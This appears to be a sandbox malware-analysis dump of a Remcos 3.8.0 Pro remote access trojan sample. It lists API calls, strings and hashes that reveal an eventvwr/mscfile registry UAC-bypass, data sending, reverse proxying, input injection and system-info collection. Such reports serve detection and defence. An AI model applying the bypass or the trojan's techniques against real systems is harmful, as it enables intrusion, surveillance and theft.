                                      • Opcode ID: f1956a37fb57c14efad3a30e8a4a694615c5a3291379cc37ed6cd6fb8765ce3b
                                      • Instruction ID: 6443803da38cddfc03973e112e1470be20db66c409a4168417c9ccfa39c85508
                                      • Opcode Fuzzy Hash: f1956a37fb57c14efad3a30e8a4a694615c5a3291379cc37ed6cd6fb8765ce3b
                                      • Instruction Fuzzy Hash: 1261D5B5D00205AFEB20CF69C841BAABBF4EF05B14F15416BE944EB381E7749D41DB58
                                      APIs
                                      • SetEvent.KERNEL32(?,?), ref: 0040549F
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040554F
                                      • TranslateMessage.USER32(?), ref: 0040555E
                                      • DispatchMessageA.USER32(?), ref: 00405569
                                      • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00471F10), ref: 00405621
                                      • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405659
                                        • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                      • String ID: CloseChat$DisplayMessage$GetMessage
                                      • API String ID: 2956720200-749203953
                                      • Opcode ID: 8363d061e95d65f7a2ee7f888858a36d84d87a9db230e482a34931f9899ae69c
                                      • Instruction ID: 0f013d79663c92f7c21c274702d2b8200e9ba5951f20e13ff122dbd33ecc2bba
                                      • Opcode Fuzzy Hash: 8363d061e95d65f7a2ee7f888858a36d84d87a9db230e482a34931f9899ae69c
                                      • Instruction Fuzzy Hash: 8B41C471A043016BCB00FB75DC5A86F77A9EB85714B40093EF946A31D2EF79C905CB9A
                                      APIs
                                        • Part of subcall function 0041626A: __EH_prolog.LIBCMT ref: 0041626F
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00463050), ref: 0041611A
                                      • CloseHandle.KERNEL32(00000000), ref: 00416123
                                      • DeleteFileA.KERNEL32(00000000), ref: 00416132
                                      • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004160E6
                                        • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                      • String ID: <$@$@%G$@%G$Temp
                                      • API String ID: 1704390241-4139030828
                                      • Opcode ID: 08cb1755ce7b468823e10bc19469487db811a439f2e1fee2786586d5cf0c4217
                                      • Instruction ID: 980de7e6e99344695fa922fac5fad97fc57b46ec9d0f9c422bd6bd0d3fbbc04a
                                      • Opcode Fuzzy Hash: 08cb1755ce7b468823e10bc19469487db811a439f2e1fee2786586d5cf0c4217
                                      • Instruction Fuzzy Hash: 48419131900209ABDB14FB61DC56AEEB739AF50308F50417EF505760E2EF785E8ACB99
                                      APIs
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 00406775
                                      • ExitProcess.KERNEL32 ref: 00406782
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExecuteExitProcessShell
                                      • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe$H"G$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                      • API String ID: 1124553745-2981478390
                                      • Opcode ID: f81247eae3f79015332808c1a6219827ff2f3429a54f145bc754c0b3d27e3679
                                      • Instruction ID: 062031feec86e4e4641db6525c6f69cb17b792298443eef288e26788f9a4eac4
                                      • Opcode Fuzzy Hash: f81247eae3f79015332808c1a6219827ff2f3429a54f145bc754c0b3d27e3679
                                      • Instruction Fuzzy Hash: 36110571A4420166D704B7A2DC57FEF32689B10B09F50003FF906B61D2EEBC5A4982DE
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041843C,00000000), ref: 00418AD2
                                      • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041843C,00000000), ref: 00418AE9
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418AF6
                                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041843C,00000000), ref: 00418B05
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B16
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B19
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ControlManager
                                      • String ID:
                                      • API String ID: 221034970-0
                                      • Opcode ID: f48ad9656113ca295579650d09b60375d847453c5a8da5cc9704ebcebf6fe379
                                      • Instruction ID: 27c4ffebcf7932a5624e60d5a3802e7503a1161fac6a42b5cc64803f4be6ae02
                                      • Opcode Fuzzy Hash: f48ad9656113ca295579650d09b60375d847453c5a8da5cc9704ebcebf6fe379
                                      • Instruction Fuzzy Hash: A211E9715002186FD610EF64DC89CFF3B6CDF41B96741012AFA0593192DF789D469AF5
                                      APIs
                                      • _free.LIBCMT ref: 00445645
                                        • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                        • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                      • _free.LIBCMT ref: 00445651
                                      • _free.LIBCMT ref: 0044565C
                                      • _free.LIBCMT ref: 00445667
                                      • _free.LIBCMT ref: 00445672
                                      • _free.LIBCMT ref: 0044567D
                                      • _free.LIBCMT ref: 00445688
                                      • _free.LIBCMT ref: 00445693
                                      • _free.LIBCMT ref: 0044569E
                                      • _free.LIBCMT ref: 004456AC
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                      • Instruction ID: 08dc7793ba969bb8ae61e50cce6790fa76a3b05f45cdd3d63b195ce4761959f1
                                      • Opcode Fuzzy Hash: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
                                      • Instruction Fuzzy Hash: A511CB7610010CBFDB01EF55C986CDD3B65FF04759B4284AAFA885F222EA35DF509B88
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00417F6F
                                      • GdiplusStartup.GDIPLUS(00471668,?,00000000), ref: 00417FA1
                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041802D
                                      • Sleep.KERNEL32(000003E8), ref: 004180B3
                                      • GetLocalTime.KERNEL32(?), ref: 004180BB
                                      • Sleep.KERNEL32(00000000,00000018,00000000), ref: 004181AA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                      • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                      • API String ID: 489098229-3790400642
                                      • Opcode ID: e5baad72940bb79ebcecbf0b82882af32cda1e4f264bb5df301604c4a02faaf0
                                      • Instruction ID: ff50de85f816598f14f139fcbfe24147e98e2bb745fd097185ef2e944e73ca26
                                      • Opcode Fuzzy Hash: e5baad72940bb79ebcecbf0b82882af32cda1e4f264bb5df301604c4a02faaf0
                                      • Instruction Fuzzy Hash: 98516071A001549BCB04BBB5C8529FD76A8AF55308F04403FF805A71E2EF7C5E85C799
                                      APIs
                                      • Sleep.KERNEL32(00001388), ref: 00409738
                                        • Part of subcall function 0040966D: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                                        • Part of subcall function 0040966D: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                                        • Part of subcall function 0040966D: Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                                        • Part of subcall function 0040966D: CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409774
                                      • GetFileAttributesW.KERNEL32(00000000), ref: 00409785
                                      • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040979C
                                      • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409816
                                        • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
                                      • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00469654,?,00000000,00000000,00000000,00000000,00000000), ref: 0040991F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                      • String ID: H"G$H"G
                                      • API String ID: 3795512280-1424798214
                                      • Opcode ID: bb7924031753751938ab9efbc0ebb6be5b08f4d8e9e86a13803501d8b38c879c
                                      • Instruction ID: 85d6828eff9e87111454ffe40de9a07a949f8ec8799fb43d86416e8e02d17308
                                      • Opcode Fuzzy Hash: bb7924031753751938ab9efbc0ebb6be5b08f4d8e9e86a13803501d8b38c879c
                                      • Instruction Fuzzy Hash: 9D513D712043015BCB14BB72C9A6ABF76999F90308F00453FB946B72E3DF7D9D09869A
                                      APIs
                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004541DF), ref: 00453107
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DecodePointer
                                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                                      • API String ID: 3527080286-3064271455
                                      • Opcode ID: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                                      • Instruction ID: 9333e61b372fbf41addd7e909d3efe481a8fa84217f9852f3907f1ba123c2b47
                                      • Opcode Fuzzy Hash: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                                      • Instruction Fuzzy Hash: CC518F30900909DBCF10DFA8E9480ADBBB0FF0A347F644196EC81A7216CB799A1DDB1D
                                      APIs
                                      • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00415A1A
                                        • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
                                      • Sleep.KERNEL32(00000064), ref: 00415A46
                                      • DeleteFileW.KERNEL32(00000000), ref: 00415A7A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CreateDeleteExecuteShellSleep
                                      • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                      • API String ID: 1462127192-2001430897
                                      • Opcode ID: e883af40929ac117bf59ffc0633053606f9cdd8738de8d0f8d746d0143d74355
                                      • Instruction ID: 7fbd65b43d39327dc9f625a99f058064c4c6325298edc9245ab65683dcac2845
                                      • Opcode Fuzzy Hash: e883af40929ac117bf59ffc0633053606f9cdd8738de8d0f8d746d0143d74355
                                      • Instruction Fuzzy Hash: FA315E719402199ACB04FBA1DC96DEE7768EF50308F40017FF506731E2EE785E8ACA99
                                      APIs
                                      • AllocConsole.KERNEL32(00000001), ref: 0041AA5D
                                      • ShowWindow.USER32(00000000,00000000), ref: 0041AA76
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocConsoleShowWindow
                                      • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.8.0 Pro$CONOUT$
                                      • API String ID: 4118500197-4025029772
                                      • Opcode ID: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                                      • Instruction ID: 07661f9972e693547954b0fc743ee20e91627884e026026f5b86345d1a8b50cd
                                      • Opcode Fuzzy Hash: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                                      • Instruction Fuzzy Hash: CE015271D803586ADB10EBF59C06FDF77AC6B18708F54142BB100A7095E7FC950C4A2D
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041B22B
                                        • Part of subcall function 0041B2C4: RegisterClassExA.USER32(00000030), ref: 0041B310
                                        • Part of subcall function 0041B2C4: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                                        • Part of subcall function 0041B2C4: GetLastError.KERNEL32 ref: 0041B335
                                      • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041B262
                                      • lstrcpynA.KERNEL32(00471AF8,Remcos,00000080), ref: 0041B27C
                                      • Shell_NotifyIconA.SHELL32(00000000,00471AE0), ref: 0041B292
                                      • TranslateMessage.USER32(?), ref: 0041B29E
                                      • DispatchMessageA.USER32(?), ref: 0041B2A8
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041B2B5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                      • String ID: Remcos
                                      • API String ID: 1970332568-165870891
                                      • Opcode ID: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                                      • Instruction ID: 392c2ce23d615fe7cfca65c1bdf78dc563e79c4ff08160ae13be93183ad442b8
                                      • Opcode Fuzzy Hash: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                                      • Instruction Fuzzy Hash: CD013971901308ABCB10DBB9ED4EEDB7BBCFB85B05F40417AF51992061D7B89489CB68
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dee208c16fd6e6a71a697de3b175f4e390e38276f2012422441a095a82cae68d
                                      • Instruction ID: 53180985ac70b1d9c95f382170f9691aec8243d5c40cf1d2be039b65846bfc46
                                      • Opcode Fuzzy Hash: dee208c16fd6e6a71a697de3b175f4e390e38276f2012422441a095a82cae68d
                                      • Instruction Fuzzy Hash: 2DC12970D44245AFEB11DFA8D841BEEBBB0BF19304F04419AE844A7392C7798D51DB6B
                                      APIs
                                        • Part of subcall function 00452A89: CreateFileW.KERNEL32(00000000,00000000,?,00452E64,?,?,00000000,?,00452E64,00000000,0000000C), ref: 00452AA6
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452ECF
                                      • __dosmaperr.LIBCMT ref: 00452ED6
                                      • GetFileType.KERNEL32(00000000), ref: 00452EE2
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452EEC
                                      • __dosmaperr.LIBCMT ref: 00452EF5
                                      • CloseHandle.KERNEL32(00000000), ref: 00452F15
                                      • CloseHandle.KERNEL32(00000000), ref: 0045305F
                                      • GetLastError.KERNEL32 ref: 00453091
                                      • __dosmaperr.LIBCMT ref: 00453098
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                      • String ID:
                                      • API String ID: 4237864984-0
                                      • Opcode ID: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
                                      • Instruction ID: def4621c7e831d5678052e1043e56ea9e2bfce8be848437acb5cac56d61a7e39
                                      • Opcode Fuzzy Hash: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
                                      • Instruction Fuzzy Hash: CAA15832A101049FDF19EF68D8417AE7BB1AB0A325F14015FFC419B392DB798D1ACB5A
                                      APIs
                                      • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045123C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0045100F
                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451092
                                      • __alloca_probe_16.LIBCMT ref: 004510CA
                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0045123C,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451125
                                      • __alloca_probe_16.LIBCMT ref: 00451174
                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 0045113C
                                        • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 004511B8
                                      • __freea.LIBCMT ref: 004511E3
                                      • __freea.LIBCMT ref: 004511EF
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                      • String ID:
                                      • API String ID: 201697637-0
                                      • Opcode ID: 77818321e3ce56ea0e71bb7bca8220fb6369df6bc1e17647591189b9ba8744e1
                                      • Instruction ID: 005ec385ace484c3041e352596739c7debf7d66643145b34d09858c349e559c3
                                      • Opcode Fuzzy Hash: 77818321e3ce56ea0e71bb7bca8220fb6369df6bc1e17647591189b9ba8744e1
                                      • Instruction Fuzzy Hash: C191D632E002169BDB209EA5C881BAF7BB59F09716F14025BED00E7292D72DDD89C768
                                      APIs
                                        • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                        • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                        • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                        • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                      • _memcmp.LIBVCRUNTIME ref: 00442935
                                      • _free.LIBCMT ref: 004429A6
                                      • _free.LIBCMT ref: 004429BF
                                      • _free.LIBCMT ref: 004429F1
                                      • _free.LIBCMT ref: 004429FA
                                      • _free.LIBCMT ref: 00442A06
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorLast$_abort_memcmp
                                      • String ID: C
                                      • API String ID: 1679612858-1037565863
                                      • Opcode ID: 1b68fb9e24b66cfa6b20be242c75466d086ab93edfb681ab48de3257ce38a64d
                                      • Instruction ID: aeaf983377083d43a1268bd0837f448671c9c2270315b144058cc99b7af0bbb4
                                      • Opcode Fuzzy Hash: 1b68fb9e24b66cfa6b20be242c75466d086ab93edfb681ab48de3257ce38a64d
                                      • Instruction Fuzzy Hash: C6B14B75A01219DFEB24DF19C984AAEB7B4FF08314F5045AEE849A7350E774AE90CF44
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: tcp$udp
                                      • API String ID: 0-3725065008
                                      • Opcode ID: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                                      • Instruction ID: 0146648cb9627796ba72a5075a1bb19f593c332394d5faf8ede73001e6eead87
                                      • Opcode Fuzzy Hash: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                                      • Instruction Fuzzy Hash: 0271AB306083029FDB24CF55C4456ABBBE5AB88B06F14483FF88587351DB78CE85CB8A
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Eventinet_ntoa
                                      • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                      • API String ID: 3578746661-168337528
                                      • Opcode ID: 033669bb88a2ba2be7e6bd04a0b09790491be95b34b048587916e769fed69fd7
                                      • Instruction ID: 6b7c77c2de925f44c7fd0444b04eaa142d1c015a05a303cede5520b91582e870
                                      • Opcode Fuzzy Hash: 033669bb88a2ba2be7e6bd04a0b09790491be95b34b048587916e769fed69fd7
                                      • Instruction Fuzzy Hash: 1B51C671A043005BC704FB35E81AAAE36A56B85304F50453FF942972E2EFBD998987CF
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00471E78,00462F54,?,00000000,0040708D,00000000), ref: 00406A56
                                      • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406A9E
                                        • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                      • CloseHandle.KERNEL32(00000000,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406ADE
                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 00406AFB
                                      • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B26
                                      • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B36
                                        • Part of subcall function 00404B76: WaitForSingleObject.KERNEL32(?,000000FF,?,00471E90,00404C29,00000000,?,?,?,00471E90,?), ref: 00404B85
                                        • Part of subcall function 00404B76: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040546B), ref: 00404BA3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                      • String ID: .part
                                      • API String ID: 1303771098-3499674018
                                      • Opcode ID: d2fd811791a77c8402bfe611c30e094ff5b1aed752cb574811ca9f19bc47c7e5
                                      • Instruction ID: 678cfffe15af58d7f0b712f13b91f409224560124cae5e22a1f642ab954cf825
                                      • Opcode Fuzzy Hash: d2fd811791a77c8402bfe611c30e094ff5b1aed752cb574811ca9f19bc47c7e5
                                      • Instruction Fuzzy Hash: 183195715043519FC210FF61D8859AFB7E8EF84305F40493FB946A21E1DB78DE488B9A
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042BAB6,?,?,?,00447215,00000001,00000001,?), ref: 0044701E
                                      • __alloca_probe_16.LIBCMT ref: 00447056
                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042BAB6,?,?,?,00447215,00000001,00000001,?), ref: 004470A4
                                      • __alloca_probe_16.LIBCMT ref: 0044713B
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044719E
                                      • __freea.LIBCMT ref: 004471AB
                                        • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                      • __freea.LIBCMT ref: 004471B4
                                      • __freea.LIBCMT ref: 004471D9
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                      • String ID:
                                      • API String ID: 3864826663-0
                                      • Opcode ID: 4a3c7fd5df8aec1f106920e086c0c8b502c59cd20239ccd34f4dcb85e5a0006e
                                      • Instruction ID: 54c76e5b98bc3e662f405ec50a570bffd16f8396d3d33e450f7b83ec1f761fab
                                      • Opcode Fuzzy Hash: 4a3c7fd5df8aec1f106920e086c0c8b502c59cd20239ccd34f4dcb85e5a0006e
                                      • Instruction Fuzzy Hash: C051F372604216AFFB258F65CC81EAF77A9EB44754F19422EFC04D6340EB38DC4296A8
                                      APIs
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417982
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179A3
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179C3
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179D7
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179ED
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A0A
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A25
                                      • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00417A41
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InputSend
                                      • String ID:
                                      • API String ID: 3431551938-0
                                      • Opcode ID: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
